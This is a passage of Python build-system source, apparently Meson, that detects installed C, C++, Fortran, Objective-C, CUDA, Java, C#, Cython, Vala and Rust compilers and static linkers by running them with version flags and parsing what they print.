CcrxCCompiler,
Xc16CCompiler,
CompCertCCompiler,
C2000CCompiler,
VisualStudioCCompiler,
)
from .cpp import (
CPPCompiler,
AppleClangCPPCompiler,
ArmCPPCompiler,
ArmclangCPPCompiler,
ClangCPPCompiler,
ClangClCPPCompiler,
GnuCPPCompiler,
ElbrusCPPCompiler,
EmscriptenCPPCompiler,
IntelCPPCompiler,
IntelClCPPCompiler,
NvidiaHPC_CPPCompiler,
PGICPPCompiler,
CcrxCPPCompiler,
C2000CPPCompiler,
VisualStudioCPPCompiler,
)
from .cs import MonoCompiler, VisualStudioCsCompiler
from .d import (
DCompiler,
DmdDCompiler,
GnuDCompiler,
LLVMDCompiler,
)
from .cuda import CudaCompiler
from .fortran import (
FortranCompiler,
G95FortranCompiler,
GnuFortranCompiler,
ElbrusFortranCompiler,
FlangFortranCompiler,
IntelFortranCompiler,
IntelClFortranCompiler,
NAGFortranCompiler,
Open64FortranCompiler,
PathScaleFortranCompiler,
NvidiaHPC_FortranCompiler,
PGIFortranCompiler,
SunFortranCompiler,
)
from .java import JavaCompiler
from .objc import (
ObjCCompiler,
AppleClangObjCCompiler,
ClangObjCCompiler,
GnuObjCCompiler,
)
from .objcpp import (
ObjCPPCompiler,
AppleClangObjCPPCompiler,
ClangObjCPPCompiler,
GnuObjCPPCompiler,
)
from .cython import CythonCompiler
from .rust import RustCompiler, ClippyRustCompiler
from .swift import SwiftCompiler
from .vala import ValaCompiler
from .mixins.visualstudio import VisualStudioLikeCompiler
from .mixins.gnu import GnuCompiler
from .mixins.clang import ClangCompiler
import subprocess
import platform
import re
import shutil
import tempfile
import os
import typing as T
if T.TYPE_CHECKING:
from ..environment import Environment
from ..programs import ExternalProgram
# Default compilers and linkers
# =============================
defaults: T.Dict[str, T.List[str]] = {}
# List of potential compilers.
if is_windows():
# Intel C and C++ compiler is icl on Windows, but icc and icpc elsewhere.
# Search for icl before cl, since Intel "helpfully" provides a
# cl.exe that returns *exactly the same thing* that microsofts
# cl.exe does, and if icl is present, it's almost certainly what
# you want.
defaults['c'] = ['icl', 'cl', 'cc', 'gcc', 'clang', 'clang-cl', 'pgcc']
# There is currently no pgc++ for Windows, only for Mac and Linux.
defaults['cpp'] = ['icl', 'cl', 'c++', 'g++', 'clang++', 'clang-cl']
defaults['fortran'] = ['ifort', 'gfortran', 'flang', 'pgfortran', 'g95']
# Clang and clang++ are valid, but currently unsupported.
defaults['objc'] = ['cc', 'gcc']
defaults['objcpp'] = ['c++', 'g++']
defaults['cs'] = ['csc', 'mcs']
else:
if platform.machine().lower() == 'e2k':
defaults['c'] = ['cc', 'gcc', 'lcc', 'clang']
defaults['cpp'] = ['c++', 'g++', 'l++', 'clang++']
defaults['objc'] = ['clang']
defaults['objcpp'] = ['clang++']
else:
defaults['c'] = ['cc', 'gcc', 'clang', 'nvc', 'pgcc', 'icc']
defaults['cpp'] = ['c++', 'g++', 'clang++', 'nvc++', 'pgc++', 'icpc']
defaults['objc'] = ['cc', 'gcc', 'clang']
defaults['objcpp'] = ['c++', 'g++', 'clang++']
defaults['fortran'] = ['gfortran', 'flang', 'nvfortran', 'pgfortran', 'ifort', 'g95']
defaults['cs'] = ['mcs', 'csc']
defaults['d'] = ['ldc2', 'ldc', 'gdc', 'dmd']
defaults['java'] = ['javac']
defaults['cuda'] = ['nvcc']
defaults['rust'] = ['rustc']
defaults['swift'] = ['swiftc']
defaults['vala'] = ['valac']
defaults['cython'] = ['cython']
defaults['static_linker'] = ['ar', 'gar']
defaults['strip'] = ['strip']
defaults['vs_static_linker'] = ['lib']
defaults['clang_cl_static_linker'] = ['llvm-lib']
defaults['cuda_static_linker'] = ['nvlink']
defaults['gcc_static_linker'] = ['gcc-ar']
defaults['clang_static_linker'] = ['llvm-ar']
def compiler_from_language(env: 'Environment', lang: str, for_machine: MachineChoice) -> T.Optional[Compiler]:
lang_map: T.Dict[str, T.Callable[['Environment', MachineChoice], Compiler]] = {
'c': detect_c_compiler,
'cpp': detect_cpp_compiler,
'objc': detect_objc_compiler,
'cuda': detect_cuda_compiler,
'objcpp': detect_objcpp_compiler,
'java': detect_java_compiler,
'cs': detect_cs_compiler,
'vala': detect_vala_compiler,
'd': detect_d_compiler,
'rust': detect_rust_compiler,
'fortran': detect_fortran_compiler,
'swift': detect_swift_compiler,
'cython': detect_cython_compiler,
}
return lang_map[lang](env, for_machine) if lang in lang_map else None
def detect_compiler_for(env: 'Environment', lang: str, for_machine: MachineChoice) -> T.Optional[Compiler]:
comp = compiler_from_language(env, lang, for_machine)
if comp is not None:
assert comp.for_machine == for_machine
env.coredata.process_new_compiler(lang, comp, env)
return comp
# Helpers
# =======
def _get_compilers(env: 'Environment', lang: str, for_machine: MachineChoice) -> T.Tuple[T.List[T.List[str]], T.List[str], T.Optional['ExternalProgram']]:
'''
The list of compilers is detected in the exact same way for
C, C++, ObjC, ObjC++, Fortran, CS so consolidate it here.
'''
value = env.lookup_binary_entry(for_machine, lang)
if value is not None:
comp, ccache = BinaryTable.parse_entry(value)
# Return value has to be a list of compiler 'choices'
compilers = [comp]
else:
if not env.machines.matches_build_machine(for_machine):
raise EnvironmentException(f'{lang!r} compiler binary not defined in cross or native file')
compilers = [[x] for x in defaults[lang]]
ccache = BinaryTable.detect_compiler_cache()
if env.machines.matches_build_machine(for_machine):
exe_wrap: T.Optional[ExternalProgram] = None
else:
exe_wrap = env.get_exe_wrapper()
return compilers, ccache, exe_wrap
def _handle_exceptions(
exceptions: T.Mapping[str, T.Union[Exception, str]],
binaries: T.List[T.List[str]],
bintype: str = 'compiler'
) -> T.NoReturn:
errmsg = f'Unknown {bintype}(s): {binaries}'
if exceptions:
errmsg += '\nThe following exception(s) were encountered:'
for c, e in exceptions.items():
errmsg += f'\nRunning "{c}" gave "{e}"'
raise EnvironmentException(errmsg)
# Linker specific
# ===============
def detect_static_linker(env: 'Environment', compiler: Compiler) -> StaticLinker:
linker = env.lookup_binary_entry(compiler.for_machine, 'ar')
if linker is not None:
linkers = [linker]
else:
default_linkers = [[l] for l in defaults['static_linker']]
if isinstance(compiler, CudaCompiler):
linkers = [defaults['cuda_static_linker']] + default_linkers
elif isinstance(compiler, VisualStudioLikeCompiler):
linkers = [defaults['vs_static_linker'], defaults['clang_cl_static_linker']]
elif isinstance(compiler, GnuCompiler):
# Use gcc-ar if available; needed for LTO
linkers = [defaults['gcc_static_linker']] + default_linkers
elif isinstance(compiler, ClangCompiler):
# Use llvm-ar if available; needed for LTO
linkers = [defaults['clang_static_linker']] + default_linkers
elif isinstance(compiler, DCompiler):
# Prefer static linkers over linkers used by D compilers
if is_windows():
linkers = [defaults['vs_static_linker'], defaults['clang_cl_static_linker'], compiler.get_linker_exelist()]
else:
linkers = default_linkers
elif isinstance(compiler, IntelClCCompiler):
# Intel has it's own linker that acts like microsoft's lib
linkers = [['xilib']]
elif isinstance(compiler, (PGICCompiler, PGIFortranCompiler)) and is_windows():
linkers = [['ar']] # For PGI on Windows, "ar" is just a wrapper calling link/lib.
else:
linkers = default_linkers
popen_exceptions = {}
for linker in linkers:
if not {'lib', 'lib.exe', 'llvm-lib', 'llvm-lib.exe', 'xilib', 'xilib.exe'}.isdisjoint(linker):
arg = '/?'
elif not {'ar2000', 'ar2000.exe'}.isdisjoint(linker):
arg = '?'
else:
arg = '--version'
try:
p, out, err = Popen_safe(linker + [arg])
except OSError as e:
popen_exceptions[' '.join(linker + [arg])] = e
continue
if "xilib: executing 'lib'" in err:
return IntelVisualStudioLinker(linker, getattr(compiler, 'machine', None))
if '/OUT:' in out.upper() or '/OUT:' in err.upper():
return VisualStudioLinker(linker, getattr(compiler, 'machine', None))
if 'ar-Error-Unknown switch: --version' in err:
return PGIStaticLinker(linker)
if p.returncode == 0 and ('armar' in linker or 'armar.exe' in linker):
return ArmarLinker(linker)
if 'DMD32 D Compiler' in out or 'DMD64 D Compiler' in out:
assert isinstance(compiler, DCompiler)
return DLinker(linker, compiler.arch)
if 'LDC - the LLVM D compiler' in out:
assert isinstance(compiler, DCompiler)
return DLinker(linker, compiler.arch, rsp_syntax=compiler.rsp_file_syntax())
if 'GDC' in out and ' based on D ' in out:
assert isinstance(compiler, DCompiler)
return DLinker(linker, compiler.arch)
if err.startswith('Renesas') and ('rlink' in linker or 'rlink.exe' in linker):
return CcrxLinker(linker)
if out.startswith('GNU ar') and ('xc16-ar' in linker or 'xc16-ar.exe' in linker):
return Xc16Linker(linker)
if out.startswith('TMS320C2000') and ('ar2000' in linker or 'ar2000.exe' in linker):
return C2000Linker(linker)
if out.startswith('The CompCert'):
return CompCertLinker(linker)
if p.returncode == 0:
return ArLinker(linker)
if p.returncode == 1 and err.startswith('usage'): # OSX
return ArLinker(linker)
if p.returncode == 1 and err.startswith('Usage'): # AIX
return AIXArLinker(linker)
if p.returncode == 1 and err.startswith('ar: bad option: --'): # Solaris
return ArLinker(linker)
_handle_exceptions(popen_exceptions, linkers, 'linker')
# Compilers
# =========
def _detect_c_or_cpp_compiler(env: 'Environment', lang: str, for_machine: MachineChoice, *, override_compiler: T.Optional[T.List[str]] = None) -> Compiler:
"""Shared implementation for finding the C or C++ compiler to use.
the override_compiler option is provided to allow compilers which use
the compiler (GCC or Clang usually) as their shared linker, to find
the linker they need.
"""
popen_exceptions: T.Dict[str, T.Union[Exception, str]] = {}
compilers, ccache, exe_wrap = _get_compilers(env, lang, for_machine)
if override_compiler is not None:
compilers = [override_compiler]
is_cross = env.is_cross_build(for_machine)
info = env.machines[for_machine]
cls: T.Union[T.Type[CCompiler], T.Type[CPPCompiler]]
for compiler in compilers:
if isinstance(compiler, str):
compiler = [compiler]
compiler_name = os.path.basename(compiler[0])
if any(os.path.basename(x) in {'cl', 'cl.exe', 'clang-cl', 'clang-cl.exe'} for x in compiler):
# Watcom C provides it's own cl.exe clone that mimics an older
# version of Microsoft's compiler. Since Watcom's cl.exe is
# just a wrapper, we skip using it if we detect its presence
# so as not to confuse Meson when configuring for MSVC.
#
# Additionally the help text of Watcom's cl.exe is paged, and
# the binary will not exit without human intervention. In
# practice, Meson will block waiting for Watcom's cl.exe to
# exit, which requires user input and thus will never exit.
if 'WATCOM' in os.environ:
def sanitize(p: str) -> str:
return os.path.normcase(os.path.abspath(p))
watcom_cls = [sanitize(os.path.join(os.environ['WATCOM'], 'BINNT', 'cl')),
sanitize(os.path.join(os.environ['WATCOM'], 'BINNT', 'cl.exe')),
sanitize(os.path.join(os.environ['WATCOM'], 'BINNT64', 'cl')),
sanitize(os.path.join(os.environ['WATCOM'], 'BINNT64', 'cl.exe')),]
found_cl = sanitize(shutil.which('cl'))
if found_cl in watcom_cls:
mlog.debug('Skipping unsupported cl.exe clone at:', found_cl)
continue
arg = '/?'
elif 'armcc' in compiler_name:
arg = '--vsn'
elif 'ccrx' in compiler_name:
arg = '-v'
elif 'xc16' in compiler_name:
arg = '--version'
elif 'ccomp' in compiler_name:
arg = '-version'
elif 'cl2000' in compiler_name:
arg = '-version'
elif compiler_name in {'icl', 'icl.exe'}:
# if you pass anything to icl you get stuck in a pager
arg = ''
else:
arg = '--version'
try:
p, out, err = Popen_safe(compiler + [arg])
except OSError as e:
popen_exceptions[' '.join(compiler + [arg])] = e
continue
if 'ccrx' in compiler_name:
out = err
full_version = out.split('\n', 1)[0]
version = search_version(out)
guess_gcc_or_lcc: T.Optional[str] = None
if 'Free Software Foundation' in out or 'xt-' in out:
guess_gcc_or_lcc = 'gcc'
if 'e2k' in out and 'lcc' in out:
guess_gcc_or_lcc = 'lcc'
if 'Microchip Technology' in out:
# this output has "Free Software Foundation" in its version
guess_gcc_or_lcc = None
if guess_gcc_or_lcc:
defines = _get_gnu_compiler_defines(compiler)
if not defines:
popen_exceptions[' '.join(compiler)] = 'no pre-processor defines'
continue
if guess_gcc_or_lcc == 'lcc':
version = _get_lcc_version_from_defines(defines)
cls = ElbrusCCompiler if lang == 'c' else ElbrusCPPCompiler
else:
version = _get_gnu_version_from_defines(defines)
cls = GnuCCompiler if lang == 'c' else GnuCPPCompiler
linker = guess_nix_linker(env, compiler, cls, for_machine)
return cls(
ccache + compiler, version, for_machine, is_cross,
info, exe_wrap, defines=defines, full_version=full_version,
linker=linker)
if 'Emscripten' in out:
cls = EmscriptenCCompiler if lang == 'c' else EmscriptenCPPCompiler
env.coredata.add_lang_args(cls.language, cls, for_machine, env)
# emcc requires a file input in order to pass arguments to the
# linker. It'll exit with an error code, but still print the
# linker version. Old emcc versions ignore -Wl,--version completely,
# however. We'll report "unknown version" in that case.
with tempfile.NamedTemporaryFile(suffix='.c') as f:
cmd = compiler + [cls.LINKER_PREFIX + "--version", f.name]
_, o, _ = Popen_safe(cmd)
linker = WASMDynamicLinker(
compiler, for_machine, cls.LINKER_PREFIX,
[], version=search_version(o))
return cls(
ccache + compiler, version, for_machine, is_cross, info,
exe_wrap, linker=linker, full_version=full_version)
if 'armclang' in out:
# The compiler version is not present in the first line of output,
# instead it is present in second line, startswith 'Component:'.
# So, searching for the 'Component' in out although we know it is
# present in second line, as we are not sure about the
# output format in future versions
arm_ver_match = re.search('.*Component.*', out)
if arm_ver_match is None:
popen_exceptions[' '.join(compiler)] = 'version string not found'
continue
arm_ver_str = arm_ver_match.group(0)
# Override previous values
version = search_version(arm_ver_str)
full_version = arm_ver_str
cls = ArmclangCCompiler if lang == 'c' else ArmclangCPPCompiler
linker = ArmClangDynamicLinker(for_machine, version=version)
env.coredata.add_lang_args(cls.language, cls, for_machine, env)
return cls(
ccache + compiler, version, for_machine, is_cross, info,
exe_wrap, full_version=full_version, linker=linker)
if 'CL.EXE COMPATIBILITY' in out:
# if this is clang-cl masquerading as cl, detect it as cl, not
# clang
arg = '--version'
try:
p, out, err = Popen_safe(compiler + [arg])
except OSError as e:
popen_exceptions[' '.join(compiler + [arg])] = e
version = search_version(out)
match = re.search('^Target: (.*?)-', out, re.MULTILINE)
if match:
target = match.group(1)
else:
target = 'unknown target'
cls = ClangClCCompiler if lang == 'c' else ClangClCPPCompiler
linker = guess_win_linker(env, ['lld-link'], cls, for_machine)
return cls(
compiler, version, for_machine, is_cross, info, target,
exe_wrap, linker=linker)
if 'clang' in out or 'Clang' in out:
linker = None
defines = _get_clang_compiler_defines(compiler)
# Even if the for_machine is darwin, we could be using vanilla
# clang.
if 'Apple' in out:
cls = AppleClangCCompiler if lang == 'c' else AppleClangCPPCompiler
else:
cls = ClangCCompiler if lang == 'c' else ClangCPPCompiler
if 'windows' in out or env.machines[for_machine].is_windows():
# If we're in a MINGW context this actually will use a gnu
# style ld, but for clang on "real" windows we'll use
# either link.exe or lld-link.exe
try:
linker = guess_win_linker(env, compiler, cls, for_machine, invoked_directly=False)
except MesonException:
pass
if linker is None:
linker = guess_nix_linker(env, compiler, cls, for_machine)
return cls(
ccache + compiler, version, for_machine, is_cross, info,
exe_wrap, defines=defines, full_version=full_version, linker=linker)
if 'Intel(R) C++ Intel(R)' in err:
version = search_version(err)
target = 'x86' if 'IA-32' in err else 'x86_64'
cls = IntelClCCompiler if lang == 'c' else IntelClCPPCompiler
env.coredata.add_lang_args(cls.language, cls, for_machine, env)
linker = XilinkDynamicLinker(for_machine, [], version=version)
return cls(
compiler, version, for_machine, is_cross, info, target,
exe_wrap, linker=linker)
if 'Microsoft' in out or 'Microsoft' in err:
# Latest versions of Visual Studio print version
# number to stderr but earlier ones print version
# on stdout. Why? Lord only knows.
# Check both outputs to figure out version.
for lookat in [err, out]:
version = search_version(lookat)
if version != 'unknown version':
break
else:
raise EnvironmentException(f'Failed to detect MSVC compiler version: stderr was\n{err!r}')
cl_signature = lookat.split('\n')[0]
match = re.search(r'.*(x86|x64|ARM|ARM64)([^_A-Za-z0-9]|$)', cl_signature)
if match:
target = match.group(1)
else:
m = f'Failed to detect MSVC compiler target architecture: \'cl /?\' output is\n{cl_signature}'
raise EnvironmentException(m)
cls = VisualStudioCCompiler if lang == 'c' else VisualStudioCPPCompiler
linker = guess_win_linker(env, ['link'], cls, for_machine)
# As of this writing, CCache does not support MSVC but sccache does.
if 'sccache' in ccache:
final_compiler = ccache + compiler
else:
final_compiler = compiler
return cls(
final_compiler, version, for_machine, is_cross, info, target,
exe_wrap, full_version=cl_signature, linker=linker)
if 'PGI Compilers' in out:
cls = PGICCompiler if lang == 'c' else PGICPPCompiler
env.coredata.add_lang_args(cls.language, cls, for_machine, env)
linker = PGIDynamicLinker(compiler, for_machine, cls.LINKER_PREFIX, [], version=version)
return cls(
ccache + compiler, version, for_machine, is_cross,
info, exe_wrap, linker=linker)
if 'NVIDIA Compilers and Tools' in out:
cls = NvidiaHPC_CCompiler if lang == 'c' else NvidiaHPC_CPPCompiler
env.coredata.add_lang_args(cls.language, cls, for_machine, env)
linker = NvidiaHPC_DynamicLinker(compiler, for_machine, cls.LINKER_PREFIX, [], version=version)
return cls(
ccache + compiler, version, for_machine, is_cross,
info, exe_wrap, linker=linker)
if '(ICC)' in out:
cls = IntelCCompiler if lang == 'c' else IntelCPPCompiler
l = guess_nix_linker(env, compiler, cls, for_machine)
return cls(
ccache + compiler, version, for_machine, is_cross, info,
exe_wrap, full_version=full_version, linker=l)
if 'ARM' in out:
cls = ArmCCompiler if lang == 'c' else ArmCPPCompiler
env.coredata.add_lang_args(cls.language, cls, for_machine, env)
linker = ArmDynamicLinker(for_machine, version=version)
return cls(
ccache + compiler, version, for_machine, is_cross,
info, exe_wrap, full_version=full_version, linker=linker)
if 'RX Family' in out:
cls = CcrxCCompiler if lang == 'c' else CcrxCPPCompiler
env.coredata.add_lang_args(cls.language, cls, for_machine, env)
linker = CcrxDynamicLinker(for_machine, version=version)
return cls(
ccache + compiler, version, for_machine, is_cross, info,
exe_wrap, full_version=full_version, linker=linker)
if 'Microchip Technology' in out:
cls = Xc16CCompiler if lang == 'c' else Xc16CCompiler
env.coredata.add_lang_args(cls.language, cls, for_machine, env)
linker = Xc16DynamicLinker(for_machine, version=version)
return cls(
ccache + compiler, version, for_machine, is_cross, info,
exe_wrap, full_version=full_version, linker=linker)
if 'CompCert' in out:
cls = CompCertCCompiler
env.coredata.add_lang_args(cls.language, cls, for_machine, env)
linker = CompCertDynamicLinker(for_machine, version=version)
return cls(
ccache + compiler, version, for_machine, is_cross, info,
exe_wrap, full_version=full_version, linker=linker)
if 'TMS320C2000 C/C++' in out:
cls = C2000CCompiler if lang == 'c' else C2000CPPCompiler
env.coredata.add_lang_args(cls.language, cls, for_machine, env)
linker = C2000DynamicLinker(compiler, for_machine, version=version)
return cls(
ccache + compiler, version, for_machine, is_cross, info,
exe_wrap, full_version=full_version, linker=linker)
_handle_exceptions(popen_exceptions, compilers)
raise EnvironmentException(f'Unknown compiler {compilers}')
def detect_c_compiler(env: 'Environment', for_machine: MachineChoice) -> Compiler:
return _detect_c_or_cpp_compiler(env, 'c', for_machine)
def detect_cpp_compiler(env: 'Environment', for_machine: MachineChoice) -> Compiler:
return _detect_c_or_cpp_compiler(env, 'cpp', for_machine)
def detect_cuda_compiler(env: 'Environment', for_machine: MachineChoice) -> Compiler:
popen_exceptions = {}
is_cross = env.is_cross_build(for_machine)
compilers, ccache, exe_wrap = _get_compilers(env, 'cuda', for_machine)
info = env.machines[for_machine]
for compiler in compilers:
arg = '--version'
try:
p, out, err = Popen_safe(compiler + [arg])
except OSError as e:
popen_exceptions[' '.join(compiler + [arg])] = e
continue
# Example nvcc printout:
#
# nvcc: NVIDIA (R) Cuda compiler driver
# Copyright (c) 2005-2018 NVIDIA Corporation
# Built on Sat_Aug_25_21:08:01_CDT_2018
# Cuda compilation tools, release 10.0, V10.0.130
#
# search_version() first finds the "10.0" after "release",
# rather than the more precise "10.0.130" after "V".
# The patch version number is occasionally important; For
# instance, on Linux,
# - CUDA Toolkit 8.0.44 requires NVIDIA Driver 367.48
# - CUDA Toolkit 8.0.61 requires NVIDIA Driver 375.26
# Luckily, the "V" also makes it very simple to extract
# the full version:
version = out.strip().split('V')[-1]
cpp_compiler = detect_cpp_compiler(env, for_machine)
cls = CudaCompiler
env.coredata.add_lang_args(cls.language, cls, for_machine, env)
linker = CudaLinker(compiler, for_machine, CudaCompiler.LINKER_PREFIX, [], version=CudaLinker.parse_version())
return cls(ccache + compiler, version, for_machine, is_cross, exe_wrap, host_compiler=cpp_compiler, info=info, linker=linker)
raise EnvironmentException(f'Could not find suitable CUDA compiler: "{"; ".join([" ".join(c) for c in compilers])}"')
def detect_fortran_compiler(env: 'Environment', for_machine: MachineChoice) -> Compiler:
popen_exceptions: T.Dict[str, T.Union[Exception, str]] = {}
compilers, ccache, exe_wrap = _get_compilers(env, 'fortran', for_machine)
is_cross = env.is_cross_build(for_machine)
info = env.machines[for_machine]
cls: T.Type[FortranCompiler]
for compiler in compilers:
for arg in ['--version', '-V']:
try:
p, out, err = Popen_safe(compiler + [arg])
except OSError as e:
popen_exceptions[' '.join(compiler + [arg])] = e
continue
version = search_version(out)
full_version = out.split('\n', 1)[0]
guess_gcc_or_lcc: T.Optional[str] = None
if 'GNU Fortran' in out:
guess_gcc_or_lcc = 'gcc'
if 'e2k' in out and 'lcc' in out:
guess_gcc_or_lcc = 'lcc'
if guess_gcc_or_lcc:
defines = _get_gnu_compiler_defines(compiler)
if not defines:
popen_exceptions[' '.join(compiler)] = 'no pre-processor defines'
continue
if guess_gcc_or_lcc == 'lcc':
version = _get_lcc_version_from_defines(defines)
cls = ElbrusFortranCompiler
linker = guess_nix_linker(env, compiler, cls, for_machine)
return cls(
compiler, version, for_machine, is_cross, info,
exe_wrap, defines, full_version=full_version, linker=linker)
else:
version = _get_gnu_version_from_defines(defines)
cls = GnuFortranCompiler
linker = guess_nix_linker(env, compiler, cls, for_machine)
return cls(
compiler, version, for_machine, is_cross, info,
exe_wrap, defines, full_version=full_version, linker=linker)
if 'G95' in out:
cls = G95FortranCompiler
linker = guess_nix_linker(env, compiler, cls, for_machine)
return G95FortranCompiler(
compiler, version, for_machine, is_cross, info,
exe_wrap, full_version=full_version, linker=linker)
if 'Sun Fortran' in err:
version = search_version(err)
cls = SunFortranCompiler
linker = guess_nix_linker(env, compiler, cls, for_machine)
return SunFortranCompiler(
compiler, version, for_machine, is_cross, info,
exe_wrap, full_version=full_version, linker=linker)
if 'Intel(R) Visual Fortran' in err or 'Intel(R) Fortran' in err:
version = search_version(err)
target = 'x86' if 'IA-32' in err else 'x86_64'
cls = IntelClFortranCompiler
env.coredata.add_lang_args(cls.language, cls, for_machine, env)
linker = XilinkDynamicLinker(for_machine, [], version=version)
return cls(
compiler, version, for_machine, is_cross, info,
target, exe_wrap, linker=linker)
if 'ifort (IFORT)' in out:
linker = guess_nix_linker(env, compiler, IntelFortranCompiler, for_machine)
return IntelFortranCompiler(
compiler, version, for_machine, is_cross, info,
exe_wrap, full_version=full_version, linker=linker)
if 'PathScale EKOPath(tm)' in err:
return PathScaleFortranCompiler(
compiler, version, for_machine, is_cross, info,
exe_wrap, full_version=full_version)
if 'PGI Compilers' in out:
cls = PGIFortranCompiler
env.coredata.add_lang_args(cls.language, cls, for_machine, env)
linker = PGIDynamicLinker(compiler, for_machine,
cls.LINKER_PREFIX, [], version=version)
return cls(
compiler, version, for_machine, is_cross, info, exe_wrap,
full_version=full_version, linker=linker)
if 'NVIDIA Compilers and Tools' in out:
cls = NvidiaHPC_FortranCompiler
env.coredata.add_lang_args(cls.language, cls, for_machine, env)
linker = PGIDynamicLinker(compiler, for_machine,
cls.LINKER_PREFIX, [], version=version)
return cls(
compiler, version, for_machine, is_cross, info, exe_wrap,
full_version=full_version, linker=linker)
if 'flang' in out or 'clang' in out:
linker = guess_nix_linker(env,
compiler, FlangFortranCompiler, for_machine)
return FlangFortranCompiler(
compiler, version, for_machine, is_cross, info,
exe_wrap, full_version=full_version, linker=linker)
if 'Open64 Compiler Suite' in err:
linker = guess_nix_linker(env,
compiler, Open64FortranCompiler, for_machine)
return Open64FortranCompiler(
compiler, version, for_machine, is_cross, info,
exe_wrap, full_version=full_version, linker=linker)
if 'NAG Fortran' in err:
full_version = err.split('\n', 1)[0]
version = full_version.split()[-1]
cls = NAGFortranCompiler
env.coredata.add_lang_args(cls.language, cls, for_machine, env)
linker = NAGDynamicLinker(
compiler, for_machine, cls.LINKER_PREFIX, [],
version=version)
return cls(
compiler, version, for_machine, is_cross, info,
exe_wrap, full_version=full_version, linker=linker)
_handle_exceptions(popen_exceptions, compilers)
raise EnvironmentException('Unreachable code (exception to make mypy happy)')
def detect_objc_compiler(env: 'Environment', for_machine: MachineChoice) -> 'Compiler':
return _detect_objc_or_objcpp_compiler(env, for_machine, True)
def detect_objcpp_compiler(env: 'Environment', for_machine: MachineChoice) -> 'Compiler':
return _detect_objc_or_objcpp_compiler(env, for_machine, False)
def _detect_objc_or_objcpp_compiler(env: 'Environment', for_machine: MachineChoice, objc: bool) -> 'Compiler':
popen_exceptions: T.Dict[str, T.Union[Exception, str]] = {}
compilers, ccache, exe_wrap = _get_compilers(env, 'objc' if objc else 'objcpp', for_machine)
is_cross = env.is_cross_build(for_machine)
info = env.machines[for_machine]
comp: T.Union[T.Type[ObjCCompiler], T.Type[ObjCPPCompiler]]
for compiler in compilers:
arg = ['--version']
try:
p, out, err = Popen_safe(compiler + arg)
except OSError as e:
popen_exceptions[' '.join(compiler + arg)] = e
continue
version = search_version(out)
if 'Free Software Foundation' in out:
defines = _get_gnu_compiler_defines(compiler)
if not defines:
popen_exceptions[' '.join(compiler)] = 'no pre-processor defines'
continue
version = _get_gnu_version_from_defines(defines)
comp = GnuObjCCompiler if objc else GnuObjCPPCompiler
linker = guess_nix_linker(env, compiler, comp, for_machine)
return comp(
ccache + compiler, version, for_machine, is_cross, info,
exe_wrap, defines, linker=linker)
if 'clang' in out:
linker = None
defines = _get_clang_compiler_defines(compiler)
if not defines:
popen_exceptions[' '.join(compiler)] = 'no pre-processor defines'
continue
if 'Apple' in out:
comp = AppleClangObjCCompiler if objc else AppleClangObjCPPCompiler
else:
comp = ClangObjCCompiler if objc else ClangObjCPPCompiler
if 'windows' in out or env.machines[for_machine].is_windows():
# If we're in a MINGW context this actually will use a gnu style ld
try:
linker = guess_win_linker(env, compiler, comp, for_machine)
except MesonException:
pass
if not linker:
linker = guess_nix_linker(env, compiler, comp, for_machine)
return comp(
ccache + compiler, version, for_machine,
is_cross, info, exe_wrap, linker=linker, defines=defines)
_handle_exceptions(popen_exceptions, compilers)
raise EnvironmentException('Unreachable code (exception to make mypy happy)')
def detect_java_compiler(env: 'Environment', for_machine: MachineChoice) -> Compiler:
exelist = env.lookup_binary_entry(for_machine, 'java')
info = env.machines[for_machine]
if exelist is None:
# TODO support fallback
exelist = [defaults['java'][0]]
try:
p, out, err = Popen_safe(exelist + ['-version'])
except OSError:
raise EnvironmentException('Could not execute Java compiler "{}"'.format(' '.join(exelist)))
if 'javac' in out or 'javac' in err:
version = search_version(err if 'javac' in err else out)
if not version or version == 'unknown version':
parts = (err if 'javac' in err else out).split()
if len(parts) > 1:
version = parts[1]
comp_class = JavaCompiler
env.coredata.add_lang_args(comp_class.language, comp_class, for_machine, env)
return comp_class(exelist, version, for_machine, info)
raise EnvironmentException('Unknown compiler "' + ' '.join(exelist) + '"')
def detect_cs_compiler(env: 'Environment', for_machine: MachineChoice) -> Compiler:
compilers, ccache, exe_wrap = _get_compilers(env, 'cs', for_machine)
popen_exceptions = {}
info = env.machines[for_machine]
for comp in compilers:
try:
p, out, err = Popen_safe(comp + ['--version'])
except OSError as e:
popen_exceptions[' '.join(comp + ['--version'])] = e
continue
version = search_version(out)
cls: T.Union[T.Type[MonoCompiler], T.Type[VisualStudioCsCompiler]]
if 'Mono' in out:
cls = MonoCompiler
elif "Visual C#" in out:
cls = VisualStudioCsCompiler
else:
continue
env.coredata.add_lang_args(cls.language, cls, for_machine, env)
return cls(comp, version, for_machine, info)
_handle_exceptions(popen_exceptions, compilers)
raise EnvironmentException('Unreachable code (exception to make mypy happy)')
def detect_cython_compiler(env: 'Environment', for_machine: MachineChoice) -> Compiler:
"""Search for a cython compiler."""
compilers, _, _ = _get_compilers(env, 'cython', for_machine)
is_cross = env.is_cross_build(for_machine)
info = env.machines[for_machine]
popen_exceptions: T.Dict[str, Exception] = {}
for comp in compilers:
try:
err = Popen_safe(comp + ['-V'])[2]
except OSError as e:
popen_exceptions[' '.join(comp + ['-V'])] = e
continue
version = search_version(err)
if 'Cython' in err:
comp_class = CythonCompiler
env.coredata.add_lang_args(comp_class.language, comp_class, for_machine, env)
return comp_class(comp, version, for_machine, info, is_cross=is_cross)
_handle_exceptions(popen_exceptions, compilers)
raise EnvironmentException('Unreachable code (exception to make mypy happy)')
def detect_vala_compiler(env: 'Environment', for_machine: MachineChoice) -> Compiler:
exelist = env.lookup_binary_entry(for_machine, 'vala')
is_cross = env.is_cross_build(for_machine)
info = env.machines[for_machine]
if exelist is None:
# TODO support fallback
exelist = [defaults['vala'][0]]
try:
p, out = Popen_safe(exelist + ['--version'])[0:2]
except OSError:
raise EnvironmentException('Could not execute Vala compiler "{}"'.format(' '.join(exelist)))
version = search_version(out)
if 'Vala' in out:
comp_class = ValaCompiler
env.coredata.add_lang_args(comp_class.language, comp_class, for_machine, env)
return comp_class(exelist, version, for_machine, is_cross, info)
raise EnvironmentException('Unknown compiler "' + ' '.join(exelist) + '"')
def detect_rust_compiler(env: 'Environment', for_machine: MachineChoice) -> RustCompiler:
popen_exceptions = {} # type: T.Dict[str, Exception]
compilers, _, exe_wrap = _get_compilers(env, 'rust', for_machine)
is_cross = env.is_cross_build(for_machine)
info = env.machines[for_machine]
cc = detect_c_compiler(env, for_machine)
is_link_exe = isinstance(cc.linker, VisualStudioLikeLinkerMixin)
override = env.lookup_binary_entry(for_machine, 'rust_ld')
for compiler in compilers:
arg = ['--version']
try:
